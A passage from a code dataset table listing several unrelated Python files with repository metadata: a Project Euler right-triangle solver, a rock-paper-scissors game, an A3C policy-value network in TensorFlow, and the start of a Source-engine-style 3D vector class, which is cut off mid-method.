text stringlengths 0 1.05M | meta dict |
|---|---|
# a^2 + b^2 = c^2
# a + b + c = p(erimeter)
# c = p-a-b
# a^2 + b^2 = (p-a-b)^2
# b = p(p-2a) / 2(p-a)
def checkValidTri(a, b, c):
    """Return True when (a, b, c) satisfies the Pythagorean relation a^2 + b^2 = c^2."""
    # Return the comparison directly instead of the if/else True/False idiom.
    return (a**2 + b**2) == c**2
def checkValidAns(a, b, c, p):
    """Return True when the three side lengths sum to the perimeter p."""
    # Return the comparison directly instead of the if/else True/False idiom.
    return (a + b + c) == p
def getC(a, b):
    """Return the hypotenuse length for a right triangle with legs a and b."""
    hyp_sq = a**2 + b**2
    return hyp_sq**0.5
def genTri(p):
    """Collect candidate integer leg lengths for a right triangle of perimeter p.

    For each candidate leg a in [0, p), the perimeter constraint forces the
    other leg to be b = p*(p - 2a) / (2*(p - a)); keep b whenever it is a
    positive integer.  (Derivation in the header comment above.)
    """
    sides = []
    # range(), not Python-2-only xrange(): works on both Python 2 and 3.
    for a in range(p):
        a = float(a)
        b = (p * (p - (2. * a))) / (2. * (p - a))
        if b.is_integer() and b > 0:
            sides.append(b)
    return sides
def findTris(sides, p):
    """Count distinct right triangles of perimeter p whose legs come from sides.

    Each unordered pair of distinct leg values is checked via chkVal(); the
    sorted (a, b, c) triple is deduplicated so each triangle counts once.
    """
    tris = []
    for a in sides:
        for b in sides:
            # Compare by value, not identity: 'is not' on floats depends on
            # object identity and only worked here by accident.  b(a) is
            # strictly decreasing, so sides never holds duplicate values and
            # '!=' keeps exactly the same pairs.
            if a != b:
                if chkVal(a, b, p):
                    tri = sorted([a, b, getC(a, b)])
                    if tri not in tris:
                        tris.append(tri)
    return len(tris)
def chkVal(a, b, p):
    """Return True when legs a and b produce a right triangle of perimeter p."""
    c = (a**2 + b**2)**0.5
    # Return the comparison directly instead of the if/else True/False idiom.
    return (a + b + c) == p
def findMax(limit):
    """Return the perimeter <= limit with the most right-triangle solutions.

    Ties keep the smallest perimeter, since only a strictly greater count
    replaces the current best.
    """
    biggest = 0
    biggestP = 0
    # range(), not Python-2-only xrange(): works on both Python 2 and 3.
    for p in range(1, limit + 1):
        cur = findTris(genTri(p), p)
        if cur > biggest:
            biggest = cur
            biggestP = p
    return biggestP  # 'biggest' holds the winning solution count.
if __name__ == "__main__":
    # Sanity check from the problem statement: p = 120 has exactly 3 solutions.
    assert findTris(genTri(120), 120) == 3
    # print() call form is valid on both Python 2 and Python 3
    # (the bare 'print expr' statement is a SyntaxError on Python 3).
    print(findMax(1000))  # 840, 8 combinations
| {
"repo_name": "jamtot/PyProjectEuler",
"path": "39 - Integer right triangles/irt.py",
"copies": "1",
"size": "1392",
"license": "mit",
"hash": -2859073560607884000,
"line_mean": 22.2,
"line_max": 67,
"alpha_frac": 0.4640804598,
"autogenerated": false,
"ratio": 2.835030549898167,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.37991110096981673,
"avg_score": null,
"num_lines": null
} |
# Two-player rock-paper-scissors on the console.
# Each player types a move; several spellings are accepted per move:
#   rock     -> 'r', 'rock', or 'sang' (Persian)
#   paper    -> 'p', 'paper', or 'kaghaz'
#   scissors -> 's', 'scissors', or 'gheichi'
# Lazy players can use the single-letter forms, others the full words.
# Unrecognised input from either player yields a validation message.
a = raw_input('Player A: ')
b = raw_input('Player B: ')

rock = ('rock', 'r', 'sang')
paper = ('paper', 'p', 'kaghaz')
scissors = ('scissors', 's', 'gheichi')


def _classify(move):
    # Map a raw answer onto its canonical move name, or None when invalid.
    for name, spellings in (('rock', rock), ('paper', paper), ('scissors', scissors)):
        if move in spellings:
            return name
    return None


# What each move defeats.
_beats = {'rock': 'scissors', 'paper': 'rock', 'scissors': 'paper'}

move_a = _classify(a)
move_b = _classify(b)

if move_a and move_b and _beats[move_a] == move_b:
    print("Player A wins the game")
elif move_a and move_b and _beats[move_b] == move_a:
    print("Player B wins the game")
elif move_a and move_b and move_a == move_b:
    print('both players chose same thing')
else:
    print('Enter a valid input')
| {
"repo_name": "iamvee/Python-Course",
"path": "Topics/01.Conditions/RockPaper1.py",
"copies": "1",
"size": "1283",
"license": "mit",
"hash": -4291881526591991300,
"line_mean": 30.8974358974,
"line_max": 67,
"alpha_frac": 0.6196414653,
"autogenerated": false,
"ratio": 2.935926773455378,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40555682387553776,
"avg_score": null,
"num_lines": null
} |
# A3C -- in progress!
from network import *
class PolicyVNetwork(Network):
    # Actor-critic (A3C) head on top of the shared torso built by Network:
    # a softmax policy output, a scalar state-value output, the combined
    # actor/critic loss, gradient clipping, and ops to sync parameters with
    # shared memory.
    # NOTE(review): targets the pre-1.0 TensorFlow API (tf.mul/tf.sub,
    # reduction_indices) and Python 2 (xrange) -- confirm before porting.

    def __init__(self, conf):
        """ Set up remaining layers, objective and loss functions, gradient
        compute and apply ops, network parameter synchronization ops, and
        summary ops. """

        super(PolicyVNetwork, self).__init__(conf)

        self.entropy_regularisation_strength = \
            conf['args'].entropy_regularisation_strength

        # Toggle additional recurrent layer
        recurrent_layer = False

        with tf.name_scope(self.name):

            # Placeholders fed at each update step: bootstrapped returns for
            # the critic, advantage estimates for the actor.
            self.critic_target_ph = tf.placeholder(
                "float32", [None], name = 'target')
            self.adv_actor_ph = tf.placeholder("float", [None], name = 'advantage')

            # LSTM layer with 256 cells
            # f = sigmoid(Wf * [h-, x] + bf)
            # i = sigmoid(Wi * [h-, x] + bi)
            # C' = sigmoid(Wc * [h-, x] + bc)
            # o = sigmoid(Wo * [h-, x] + bo)
            # C = f * C_ + i x C'
            # h = o * tan C
            # state = C
            # o4 = x
            if recurrent_layer:
                layer_name = 'lstm_layer' ; hiddens = 256 ; dim = 256
                with tf.variable_scope(self.name+'/'+layer_name) as vs:
                    self.lstm_cell = tf.nn.rnn_cell.LSTMCell(hiddens, dim)
                    self.lstm_cell_state = tf.Variable(
                        tf.zeros([1, self.lstm_cell.state_size]))
                    self.ox, self.lstm_cell_state = self.lstm_cell(
                        self.o3, self.lstm_cell_state)
                    # Get all LSTM trainable params
                    self.lstm_trainable_variables = [v for v in
                        tf.trainable_variables() if v.name.startswith(vs.name)]
            else:
                # self.o3 / self.o4 are the last torso activations created by
                # the Network base class for the two DQN architectures.
                if self.arch == "NIPS":
                    self.ox = self.o3
                else: #NATURE
                    self.ox = self.o4

            # Final actor layer
            layer_name = 'softmax_policy4'
            self.wpi, self.bpi, self.output_layer_pi = self._softmax(
                layer_name, self.ox, self.num_actions)

            # Avoiding log(0) by adding a very small quantity (1e-30) to output.
            self.log_output_layer_pi = tf.log(tf.add(self.output_layer_pi,
                tf.constant(1e-30)), name= layer_name + '_log_policy')

            # Entropy: sum_a (-p_a ln p_a)
            self.output_layer_entropy = tf.reduce_sum(tf.mul(
                tf.constant(-1.0),
                tf.mul(self.output_layer_pi, self.log_output_layer_pi)), reduction_indices = 1)

            # Final critic layer
            self.wv, self.bv, self.output_layer_v = self._fc(
                'fc_value4', self.ox, 1, activation = "linear")

            # Parameter list used for gradients and shared-memory sync; the
            # ordering here must match the shared-memory layout elsewhere.
            if self.arch == "NIPS":
                self.params = [self.w1, self.b1, self.w2, self.b2, self.w3,
                    self.b3, self.wpi, self.bpi, self.wv, self.bv]
            else: #NATURE
                self.params = [self.w1, self.b1, self.w2, self.b2, self.w3,
                    self.b3, self.w4, self.b4, self.wpi, self.bpi, self.wv, self.bv]
            if recurrent_layer:
                self.params += self.lstm_trainable_variables

            # Advantage critic
            self.adv_critic = tf.sub(self.critic_target_ph, tf.reshape(self.output_layer_v, [-1]))

            # Actor objective
            # Multiply the output of the network by a one hot vector, 1 for the
            # executed action. This will make the non-regularised objective
            # term for non-selected actions to be zero.
            log_output_selected_action = tf.reduce_sum(
                tf.mul(self.log_output_layer_pi, self.selected_action_ph),
                reduction_indices = 1)
            actor_objective_advantage_term = tf.mul(
                log_output_selected_action, self.adv_actor_ph)
            actor_objective_entropy_term = tf.mul(
                self.entropy_regularisation_strength, self.output_layer_entropy)
            # Negated because the optimizer minimises: maximising
            # (advantage + entropy) == minimising its negation.
            self.actor_objective = tf.reduce_sum(tf.mul(
                tf.constant(-1.0), tf.add(actor_objective_advantage_term,
                    actor_objective_entropy_term)))

            # Critic loss
            if self.clip_loss_delta > 0:
                # Huber-style loss: quadratic inside the delta, linear outside.
                quadratic_part = tf.minimum(tf.abs(self.adv_critic),
                    tf.constant(self.clip_loss_delta))
                linear_part = tf.sub(tf.abs(self.adv_critic), quadratic_part)
                #OBS! For the standard L2 loss, we should multiply by 0.5. However, the authors of the paper
                # recommend multiplying the gradients of the V function by 0.5. Thus the 0.5
                self.critic_loss = tf.mul(tf.constant(0.5), tf.nn.l2_loss(quadratic_part) + \
                    self.clip_loss_delta * linear_part)
            else:
                #OBS! For the standard L2 loss, we should multiply by 0.5. However, the authors of the paper
                # recommend multiplying the gradients of the V function by 0.5. Thus the 0.5
                self.critic_loss = tf.mul(tf.constant(0.5), tf.nn.l2_loss(self.adv_critic))

            self.loss = self.actor_objective + self.critic_loss

            # Optimizer
            grads = tf.gradients(self.loss, self.params)

            # This is not really an operation, but a list of gradient Tensors.
            # When calling run() on it, the value of those Tensors
            # (i.e., of the gradients) will be calculated
            if self.clip_norm_type == 'ignore':
                # Unclipped gradients
                self.get_gradients = grads
            elif self.clip_norm_type == 'global':
                # Clip network grads by network norm
                self.get_gradients = tf.clip_by_global_norm(
                    grads, self.clip_norm)[0]
            elif self.clip_norm_type == 'local':
                # Clip layer grads by layer norm
                self.get_gradients = [tf.clip_by_norm(
                    g, self.clip_norm) for g in grads]

            # Placeholders for shared memory vars
            self.params_ph = []
            for p in self.params:
                self.params_ph.append(tf.placeholder(tf.float32,
                    shape=p.get_shape(),
                    name="shared_memory_for_{}".format(
                        (p.name.split("/", 1)[1]).replace(":", "_"))))

            # Ops to sync net with shared memory vars
            self.sync_with_shared_memory = []
            for i in xrange(len(self.params)):
                self.sync_with_shared_memory.append(
                    self.params[i].assign(self.params_ph[i]))
| {
"repo_name": "traai/async-deep-rl",
"path": "algorithms/policy_v_network.py",
"copies": "1",
"size": "6869",
"license": "apache-2.0",
"hash": -4119399797232279600,
"line_mean": 45.7278911565,
"line_max": 108,
"alpha_frac": 0.5147765322,
"autogenerated": false,
"ratio": 3.88737973967176,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49021562718717604,
"avg_score": null,
"num_lines": null
} |
"""A 3D vector class which matches Valve conventions.
>>> Vec(1, 2, 3)
Vec(1, 2, 3)
>>> Vec(1, 2, 3) * 2
Vec(2, 4, 6)
>>> Vec.from_str('<4 2 -45>')
Vec(4, 2, -45)
Vectors support arithmetic with scalars, applying the operation to the three
components.
Call Vec.as_tuple() to get a tuple-version of the vector, useful as a
dictionary key. Vec will treat 3-tuples as equivalent to itself, converting it
when used in math operations and comparing values.
Index via .x, .y, .z attributes, or 'x', 'y', 'z', 0, 1, 2 index access.
Rotations are represented by Euler angles, but modifications need to be
performed using matrices.
Rotations are implemented as a matrix-multiplication, where the left is rotated
by the right. Vectors can be rotated by matrices and angles and matrices
can be rotated by angles, but not vice-versa.
Scales magnitude:
- Vec * Scalar
- Scalar * Vec
- Angle * Scalar
- Scalar * Angle
Rotates LHS by RHS:
- Vec @ Angle
- Vec @ Matrix
- Angle @ Angle
- Angle @ Matrix
- Matrix @ Matrix
"""
import math
import contextlib
import warnings
from typing import (
Union, Tuple, overload, Type,
Dict, NamedTuple,
Iterator, Iterable, SupportsRound, Optional, TYPE_CHECKING,
)
# Public API of this module.
__all__ = [
    'parse_vec_str', 'to_matrix', 'lerp',
    'Vec', 'Vec_tuple',
    'Angle', 'Matrix',
]
# Type aliases
Tuple3 = Tuple[float, float, float]  # A plain (x, y, z) or (pitch, yaw, roll) triple.
AnyVec = Union['Vec', 'Vec_tuple', Tuple3]  # Anything usable as a 3-component vector.
def lerp(x: float, in_min: float, in_max: float, out_min: float, out_max: float) -> float:
    """Linearly interpolate from in to out.

    If both in values are the same, ZeroDivisionError is raised.
    """
    out_span = out_max - out_min
    in_span = in_max - in_min
    return out_min + ((x - in_min) * out_span) / in_span
def parse_vec_str(val: Union[str, 'Vec', 'Angle'], x=0.0, y=0.0, z=0.0) -> Tuple3:
    """Convert a string in the form '(4 6 -4)' into a set of floats.

    If the string is unparsable, this uses the defaults (x,y,z).
    The string can start with any of the (), {}, [], <> bracket
    types.

    If the 'string' is actually a Vec, the values will be returned.
    """
    if not isinstance(val, str):
        # Non-string values: pull components straight off Vec/Angle
        # instances, otherwise fall back to the defaults.
        if isinstance(val, Py_Vec):
            return val.x, val.y, val.z
        if isinstance(val, Py_Angle):
            return val.pitch, val.yaw, val.roll
        return x, y, z

    text = val.strip()
    # Strip one optional layer of brackets, of any style.
    if text and text[0] in '({[<':
        text = text[1:]
    if text and text[-1] in ')}]>':
        text = text[:-1]

    parts = text.split()
    if len(parts) != 3:
        return x, y, z
    try:
        return float(parts[0]), float(parts[1]), float(parts[2])
    except ValueError:
        return x, y, z
def to_matrix(value: Union['Angle', 'Matrix', 'Vec', Tuple3, None]) -> 'Matrix':
    """Convert various values to a rotation matrix.

    Vectors will be treated as angles, and None as the identity.
    """
    if value is None:
        return Py_Matrix()
    if isinstance(value, Matrix):
        return value
    if isinstance(value, Angle):
        return Matrix.from_angle(value)
    # Any other 3-value sequence is unpacked as pitch/yaw/roll.
    pitch, yaw, roll = value
    return Matrix.from_angle(Angle(pitch, yaw, roll))
class Vec_tuple(NamedTuple):
    """An immutable tuple, useful for dictionary keys."""
    # Axis components, in standard (x, y, z) tuple order.
    x: float
    y: float
    z: float
# Use template code to reduce duplication in the various magic number methods.
_VEC_ADDSUB_TEMP = '''
def __{func}__(self, other: Union['Vec', tuple, float]):
"""{op} operation.
This additionally works on scalars (adds to all axes).
"""
if isinstance(other, Py_Vec):
return Py_Vec(
self.x {op} other.x,
self.y {op} other.y,
self.z {op} other.z,
)
try:
if isinstance(other, tuple):
x = self.x {op} other[0]
y = self.y {op} other[1]
z = self.z {op} other[2]
else:
x = self.x {op} other
y = self.y {op} other
z = self.z {op} other
except TypeError:
return NotImplemented
else:
return Py_Vec(x, y, z)
def __r{func}__(self, other: Union['Vec', tuple, float]):
"""{op} operation with reversed operands.
This additionally works on scalars (adds to all axes).
"""
if isinstance(other, Py_Vec):
return Py_Vec(
other.x {op} self.x,
other.y {op} self.y,
other.z {op} self.z,
)
try:
if isinstance(other, tuple):
x = other[0] {op} self.x
y = other[1] {op} self.y
z = other[2] {op} self.z
else:
x = other {op} self.x
y = other {op} self.y
z = other {op} self.z
except TypeError:
return NotImplemented
else:
return Py_Vec(x, y, z)
def __i{func}__(self, other: Union['Vec', tuple, float]):
"""{op}= operation.
Like the normal one except without duplication.
"""
if isinstance(other, Py_Vec):
self.x {op}= other.x
self.y {op}= other.y
self.z {op}= other.z
elif isinstance(other, tuple):
self.x {op}= other[0]
self.y {op}= other[1]
self.z {op}= other[2]
elif isinstance(other, (int, float)):
orig = self.x, self.y, self.z
self.x {op}= other
self.y {op}= other
self.z {op}= other
else:
return NotImplemented
return self
'''
# Multiplication and division doesn't work with two vectors - use dot/cross
# instead.
_VEC_MULDIV_TEMP = '''
def __{func}__(self, other: float):
"""Vector {op} scalar operation."""
if isinstance(other, Py_Vec):
raise TypeError("Cannot {pretty} 2 Vectors.")
else:
try:
return Py_Vec(
self.x {op} other,
self.y {op} other,
self.z {op} other,
)
except TypeError:
return NotImplemented
def __r{func}__(self, other: float):
"""scalar {op} Vector operation."""
if isinstance(other, Py_Vec):
raise TypeError("Cannot {pretty} 2 Vectors.")
else:
try:
return Py_Vec(
other {op} self.x,
other {op} self.y,
other {op} self.z,
)
except TypeError:
return NotImplemented
def __i{func}__(self, other: float):
"""{op}= operation.
Like the normal one except without duplication.
"""
if isinstance(other, Py_Vec):
raise TypeError("Cannot {pretty} 2 Vectors.")
else:
self.x {op}= other
self.y {op}= other
self.z {op}= other
return self
'''
# Subclassing this causes isinstance() to become very slow, trying to check
# for __round__ on everything. So at runtime swap it out so it doesn't inherit.
# After this swap, the SupportsRound['Vec'] expression in the class header
# below subscripts this dict and evaluates to `object`, so Vec really
# inherits from object while type checkers still see SupportsRound.
globals()['SupportsRound'] = {'Vec': object}
class Vec(SupportsRound['Vec']):
    """A 3D Vector. This has most standard Vector functions.

    Many of the functions will accept a 3-tuple for comparison purposes.
    """
    # No per-instance __dict__; keeps the many small Vec objects compact.
    __slots__ = ('x', 'y', 'z')

    # Maps one axis to the other two, and any ordered pair of axes to the
    # remaining one.
    # Make type checkers understand that you can't do str->str or tuple->tuple.
    INV_AXIS: Union[Dict[str, Tuple[str, str]], Dict[Tuple[str, str], str]] = {
        'x': ('y', 'z'),
        'y': ('x', 'z'),
        'z': ('x', 'y'),

        ('y', 'z'): 'x',
        ('x', 'z'): 'y',
        ('x', 'y'): 'z',

        ('z', 'y'): 'x',
        ('z', 'x'): 'y',
        ('y', 'x'): 'z',
    }

    # Vectors pointing in all cardinal directions
    N = north = y_pos = Vec_tuple(0, 1, 0)
    S = south = y_neg = Vec_tuple(0, -1, 0)
    E = east = x_pos = Vec_tuple(1, 0, 0)
    W = west = x_neg = Vec_tuple(-1, 0, 0)
    T = top = z_pos = Vec_tuple(0, 0, 1)
    B = bottom = z_neg = Vec_tuple(0, 0, -1)
    def __init__(
        self,
        x: Union[int, float, 'Vec', Iterable[float]]=0.0,
        y: float=0.0,
        z: float=0.0,
    ) -> None:
        """Create a Vector.

        All values are converted to Floats automatically.
        If no value is given, that axis will be set to 0.
        An iterable can be passed in (as the x argument), which will be
        used for x, y, and z.
        """
        if isinstance(x, (int, float)):
            self.x = float(x)
            self.y = float(y)
            self.z = float(z)
        elif isinstance(x, Py_Vec):
            # Copying another Vec: components are already floats.
            self.x = x.x
            self.y = x.y
            self.z = x.z
        else:
            # Generic iterable: missing values fall back to 0.0 / y / z.
            it = iter(x)
            self.x = float(next(it, 0.0))
            self.y = float(next(it, y))
            self.z = float(next(it, z))
    def copy(self) -> 'Vec':
        """Create a duplicate of this vector."""
        return Py_Vec(self.x, self.y, self.z)

    __copy__ = copy  # copy module support.

    def __reduce__(self) -> tuple:
        """Pickling support.

        This redirects to a global function, so C/Python versions
        interoperate.
        """
        return _mk_vec, (self.x, self.y, self.z)
    @classmethod
    def from_str(cls, val: Union[str, 'Vec'], x: float=0.0, y: float=0.0, z: float=0.0) -> 'Vec':
        """Convert a string in the form '(4 6 -4)' into a Vector.

        If the string is unparsable, this uses the defaults (x,y,z).
        The string can start with any of the (), {}, [], <> bracket
        types, or none.

        If the value is already a vector, a copy will be returned.
        """
        # All parsing is delegated to the module-level helper.
        x, y, z = Py_parse_vec_str(val, x, y, z)
        return cls(x, y, z)
@classmethod
@overload
def with_axes(cls, axis1: str, val1: Union[float, 'Vec']) -> 'Vec': ...
@classmethod
@overload
def with_axes(
cls,
axis1: str, val1: Union[float, 'Vec'],
axis2: str, val2: Union[float, 'Vec'],
) -> 'Vec': ...
@classmethod
@overload
def with_axes(
cls,
axis1: str, val1: Union[float, 'Vec'],
axis2: str, val2: Union[float, 'Vec'],
axis3: str, val3: Union[float, 'Vec'],
) -> 'Vec': ...
    @classmethod
    def with_axes(
        cls,
        axis1: str,
        val1: Union[float, 'Vec'],
        axis2: Optional[str]=None,  # Annotation fixed: implicitly optional.
        val2: Union[float, 'Vec']=0.0,
        axis3: Optional[str]=None,  # Annotation fixed: implicitly optional.
        val3: Union[float, 'Vec']=0.0,
    ) -> 'Vec':
        """Create a Vector, given a number of axes and corresponding values.

        This is a convenience for doing the following:
            vec = Vec()
            vec[axis1] = val1
            vec[axis2] = val2
            vec[axis3] = val3
        The magnitudes can also be Vectors, in which case the matching
        axis will be used from the vector.
        """
        vec = cls()
        # For Vec magnitudes, copy only the component named by the axis.
        vec[axis1] = val1[axis1] if isinstance(val1, Py_Vec) else val1
        if axis2 is not None:
            vec[axis2] = val2[axis2] if isinstance(val2, Py_Vec) else val2
            if axis3 is not None:
                vec[axis3] = val3[axis3] if isinstance(val3, Py_Vec) else val3
        return vec
    def rotate(
        self,
        pitch: float=0.0,
        yaw: float=0.0,
        roll: float=0.0,
        round_vals: bool=True,
    ) -> 'Vec':
        """Rotate a vector by a Source rotational angle.
        Returns the vector, so you can use it in the form
        val = Vec(0,1,0).rotate(p, y, r)

        If round is True, all values will be rounded to 6 decimals
        (since these calculations always have small imprecision.)

        Deprecated: use `vec @ Angle(pitch, yaw, roll)` instead.
        """
        warnings.warn("Use vec @ Angle() instead.", DeprecationWarning, stacklevel=2)
        mat = Py_Matrix.from_angle(Py_Angle(pitch, yaw, roll))
        # The matrix helper mutates this vector in place.
        mat._vec_rot(self)
        if round_vals:
            self.x = round(self.x, 6)
            self.y = round(self.y, 6)
            self.z = round(self.z, 6)
        return self
    def rotate_by_str(self, ang: str, pitch=0.0, yaw=0.0, roll=0.0, round_vals=True) -> 'Vec':
        """Rotate a vector, using a string instead of a vector.

        If the string cannot be parsed, use the passed in values instead.

        Deprecated: use `vec @ Angle.from_str(ang)` instead.
        """
        warnings.warn("Use vec @ Angle.from_str() instead.", DeprecationWarning, stacklevel=2)
        mat = Py_Matrix.from_angle(Py_Angle.from_str(ang, pitch, yaw, roll))
        # The matrix helper mutates this vector in place.
        mat._vec_rot(self)
        if round_vals:
            self.x = round(self.x, 6)
            self.y = round(self.y, 6)
            self.z = round(self.z, 6)
        return self
@staticmethod
@overload
def bbox(__point: Iterable['Vec']) -> Tuple['Vec', 'Vec']: ...
@staticmethod
@overload
def bbox(*points: 'Vec') -> Tuple['Vec', 'Vec']: ...
    @staticmethod
    def bbox(*points: Union[Iterable['Vec'], 'Vec']) -> Tuple['Vec', 'Vec']:
        """Compute the bounding box for a set of points.

        Pass either several Vecs, or an iterable of Vecs.
        Returns a (min, max) tuple.
        """
        # Allow passing a single iterable, but also handle a single Vec.
        # The error messages match those produced by min()/max().
        first: Vec
        point_coll: Iterable[Vec]
        if len(points) == 1 and not isinstance(points[0], Py_Vec):
            # A single non-Vec argument: treat as an iterable of Vecs.
            try:
                [[first, *point_coll]] = points  # type: ignore # len() can't narrow
            except ValueError:
                raise ValueError('Vec.bbox() arg is an empty sequence') from None
        else:
            try:
                first, *point_coll = points  # type: ignore # len() can't narrow
            except ValueError:
                raise TypeError(
                    'Vec.bbox() expected at '
                    'least 1 argument, got 0.'
                ) from None

        # Accumulate min/max in place, starting from the first point.
        bbox_min = Py_Vec(first)
        bbox_max = bbox_min.copy()
        for point in point_coll:
            bbox_min.min(point)
            bbox_max.max(point)
        return bbox_min, bbox_max
    @classmethod
    def iter_grid(
        cls,
        min_pos: 'Vec',
        max_pos: 'Vec',
        stride: int=1,
    ) -> Iterator['Vec']:
        """Loop over points in a bounding box. All coordinates should be integers.

        Both borders will be included.
        """
        min_x = int(min_pos.x)
        min_y = int(min_pos.y)
        min_z = int(min_pos.z)

        max_x = int(max_pos.x)
        max_y = int(max_pos.y)
        max_z = int(max_pos.z)

        # +1 on each bound so the max border is produced too.
        for x in range(min_x, max_x + 1, stride):
            for y in range(min_y, max_y + 1, stride):
                for z in range(min_z, max_z + 1, stride):
                    yield cls(x, y, z)
    def iter_line(self, end: 'Vec', stride: int=1) -> Iterator['Vec']:
        """Yield points between this point and 'end' (including both endpoints).

        Stride specifies the distance between each point.
        If the distance is less than the stride, only end-points will be yielded.
        If they are the same, that point will be yielded.
        """
        offset = end - self
        length = offset.mag()
        if length < stride:
            # Not enough room, yield both
            yield self.copy()
            if self != end:
                yield end.copy()
            return

        direction = offset.norm()
        for pos in range(0, int(length), int(stride)):
            yield self + direction * pos
        yield end.copy()  # Directly yield - ensures no rounding errors.
def axis(self) -> str:
"""For a normal vector, return the axis it is on."""
x = abs(self.x) > 1e-6
y = abs(self.y) > 1e-6
z = abs(self.z) > 1e-6
if x and not y and not z:
return 'x'
if not x and y and not z:
return 'y'
if not x and not y and z:
return 'z'
raise ValueError(
f'({self.x:g}, {self.y:g}, {self.z:g}) is '
f'not an on-axis vector!'
)
    def to_angle(self, roll: float=0) -> 'Angle':
        """Convert a normal to a Source Engine angle.

        A +x axis vector will result in a 0, 0, 0 angle. The roll is not
        affected by the direction of the normal.

        The inverse of this is `Vec(x=1) @ Angle(pitch, yaw, roll)`.
        """
        # Pitch is applied first, so we need to reconstruct the x-value
        horiz_dist = math.hypot(self.x, self.y)
        return Py_Angle(
            # Negative z because Source pitch is inverted relative to atan2.
            math.degrees(math.atan2(-self.z, horiz_dist)),
            math.degrees(math.atan2(self.y, self.x)) % 360,
            roll,
        )
    def to_angle_roll(self, z_norm: 'Vec', stride: int=0) -> 'Angle':
        """Produce a Source Engine angle with roll.

        The z_normal should point in +z, and must be at right angles to this
        vector.
        This is deprecated, use Matrix.from_basis().to_angle().
        Stride is no longer used.
        """
        warnings.warn('Use Matrix.from_basis().to_angle()', DeprecationWarning)
        return Py_Matrix.from_basis(x=self, z=z_norm).to_angle()
    def rotation_around(self, rot: float=90) -> 'Angle':
        """For an axis-aligned normal, return the angles which rotate around it.

        This is deprecated, use Matrix.axis_angle().to_angle().
        """
        warnings.warn('Use Matrix.axis_angle().to_angle()', DeprecationWarning)
        # copysign() transfers the normal's direction onto the rotation.
        if self.x and not self.y and not self.z:
            return Py_Angle(roll=math.copysign(rot, self.x))
        elif self.y and not self.x and not self.z:
            return Py_Angle(pitch=math.copysign(rot, self.y))
        elif self.z and not self.x and not self.y:
            return Py_Angle(yaw=math.copysign(rot, self.z))
        else:
            raise ValueError('Zero vector!')
    def __abs__(self) -> 'Vec':
        """Performing abs() on a Vec takes the absolute value of all axes."""
        return Py_Vec(
            abs(self.x),
            abs(self.y),
            abs(self.z),
        )
    # The numeric magic methods are defined via exec(), so we need stubs
    # to annotate them in a way a type-checker can understand.
    # These are immediately overwritten.
    def __add__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
    def __radd__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
    def __iadd__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
    def __sub__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
    def __rsub__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
    def __isub__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
    def __mul__(self, other: float) -> 'Vec': ...
    def __rmul__(self, other: float) -> 'Vec': ...
    def __imul__(self, other: float) -> 'Vec': ...
    def __truediv__(self, other: float) -> 'Vec': ...
    def __rtruediv__(self, other: float) -> 'Vec': ...
    def __itruediv__(self, other: float) -> 'Vec': ...
    def __floordiv__(self, other: float) -> 'Vec': ...
    def __rfloordiv__(self, other: float) -> 'Vec': ...
    def __ifloordiv__(self, other: float) -> 'Vec': ...
    def __mod__(self, other: float) -> 'Vec': ...
    def __rmod__(self, other: float) -> 'Vec': ...
    def __imod__(self, other: float) -> 'Vec': ...

    funcname = op = pretty = None

    # Use exec() to generate all the number magic methods. This reduces code
    # duplication since they're all very similar.
    for funcname, op in (('add', '+'), ('sub', '-')):
        exec(
            _VEC_ADDSUB_TEMP.format(func=funcname, op=op),
            globals(),
            locals(),
        )

    for funcname, op, pretty in (
        ('mul', '*', 'multiply'),
        ('truediv', '/', 'divide'),
        ('floordiv', '//', 'floor-divide'),
        ('mod', '%', 'modulus'),
    ):
        exec(
            _VEC_MULDIV_TEMP.format(func=funcname, op=op, pretty=pretty),
            globals(),
            locals(),
        )

    # Remove the loop variables from the class namespace.
    del funcname, op, pretty
    # Divmod is entirely unique.
    def __divmod__(self, other: float) -> Tuple['Vec', 'Vec']:
        """Divide the vector by a scalar, returning the result and remainder."""
        if isinstance(other, Py_Vec):
            raise TypeError("Cannot divide 2 Vectors.")
        else:
            try:
                x1, x2 = divmod(self.x, other)
                y1, y2 = divmod(self.y, other)
                z1, z2 = divmod(self.z, other)
            except TypeError:
                # Unsupported scalar type: let Python try the other operand.
                return NotImplemented
            else:
                return Py_Vec(x1, y1, z1), Py_Vec(x2, y2, z2)
    def __rdivmod__(self, other: float) -> Tuple['Vec', 'Vec']:
        """Divide a scalar by a vector, returning the result and remainder."""
        try:
            x1, x2 = divmod(other, self.x)
            y1, y2 = divmod(other, self.y)
            z1, z2 = divmod(other, self.z)
        except (TypeError, ValueError):
            # TypeError: unsupported scalar; ValueError can come from divmod.
            return NotImplemented
        else:
            return Py_Vec(x1, y1, z1), Py_Vec(x2, y2, z2)
    def __matmul__(self, other: Union['Angle', 'Matrix']) -> 'Vec':
        """Rotate this vector by an angle or matrix."""
        if isinstance(other, Py_Matrix):
            mat = other
        elif isinstance(other, Py_Angle):
            mat = Py_Matrix.from_angle(other)
        else:
            return NotImplemented
        # NOTE(review): constructs Vec (not Py_Vec) unlike sibling methods --
        # confirm whether this is intentional for the C/Python interop.
        res = Vec(self.x, self.y, self.z)
        mat._vec_rot(res)
        return res
    def __imatmul__(self, other: Union['Angle', 'Matrix']) -> 'Vec':
        """We need to define this, so it's in-place."""
        if isinstance(other, Py_Matrix):
            mat = other
        elif isinstance(other, Py_Angle):
            mat = Py_Matrix.from_angle(other)
        else:
            return NotImplemented
        # Rotate self directly rather than a copy.
        mat._vec_rot(self)
        return self
    def __bool__(self) -> bool:
        """Vectors are True if any axis is non-zero."""
        return self.x != 0 or self.y != 0 or self.z != 0
    def __eq__(self, other: object) -> bool:
        """== test.

        Two Vectors are compared based on the axes.
        A Vector can be compared with a 3-tuple as if it was a Vector also.
        A tolerance of 1e-6 is accounted for automatically.
        """
        if isinstance(other, Py_Vec):
            # Every axis must agree within the tolerance.
            return (
                abs(other.x - self.x) < 1e-6 and
                abs(other.y - self.y) < 1e-6 and
